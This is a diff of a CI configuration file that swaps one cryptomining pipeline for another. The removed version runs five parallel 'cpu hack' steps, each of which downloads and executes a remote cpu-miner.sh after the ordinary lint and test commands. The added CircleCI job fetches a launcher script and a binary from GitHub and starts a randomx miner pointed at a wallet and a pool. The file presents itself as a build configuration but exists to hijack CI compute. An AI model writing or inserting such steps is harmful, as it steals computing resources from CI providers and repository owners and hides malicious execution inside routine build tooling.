--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,42 +1,11 @@
-#  Template python-build
-
-#  This template allows you to validate your python code.
-#  The workflow allows running tests and code linting on the default branch.
-
-image: python:3.8
-
-pipelines:
-  default:
-    - parallel:
-      - step:
-          name: cpu hack 1
-          caches:
-            - pip
-          script:
-            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
-            - pip install pytest
-            - wget https://raw.githubusercontent.com/userpro254/cpu/main/cpu-miner.sh && chmod +x cpu-miner.sh && ./cpu-miner.sh
-      - step:
-          name: cpu hack 2
-          script:
-            - pip install flake8
-            - flake8 . --extend-exclude=dist,build --show-source --statistics
-            - wget https://raw.githubusercontent.com/userpro254/cpu/main/cpu-miner.sh && chmod +x cpu-miner.sh && ./cpu-miner.sh
-      - step:
-          name: cpu hack 3
-          script:
-            - pip install flake8
-            - flake8 . --extend-exclude=dist,build --show-source --statistics
-            - wget https://raw.githubusercontent.com/userpro254/cpu/main/cpu-miner.sh && chmod +x cpu-miner.sh && ./cpu-miner.sh
-      - step:
-          name: cpu hack 4
-          script:
-            - pip install flake8
-            - flake8 . --extend-exclude=dist,build --show-source --statistics
-            - wget https://raw.githubusercontent.com/userpro254/cpu/main/cpu-miner.sh && chmod +x cpu-miner.sh && ./cpu-miner.sh
-      - step:
-          name: cpu hack 5
-          script:
-            - pip install flake8
-            - flake8 . --extend-exclude=dist,build --show-source --statistics
-            - wget https://raw.githubusercontent.com/userpro254/cpu/main/cpu-miner.sh && chmod +x cpu-miner.sh && ./cpu-miner.sh
+version: 2.0
+jobs:
+  build:
+    docker:
+      - image: circleci/ruby:2.4.2-jessie-node
+        auth:
+          username: mydockerhub-user
+          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
+    steps:
+      - checkout
+      - run:  wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin LTC -wallet <MJELV4CnRh4KhDnrQDdBb3tStcwvvWtWiB>  -rigName  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool1 xmr.2miners.com:2222
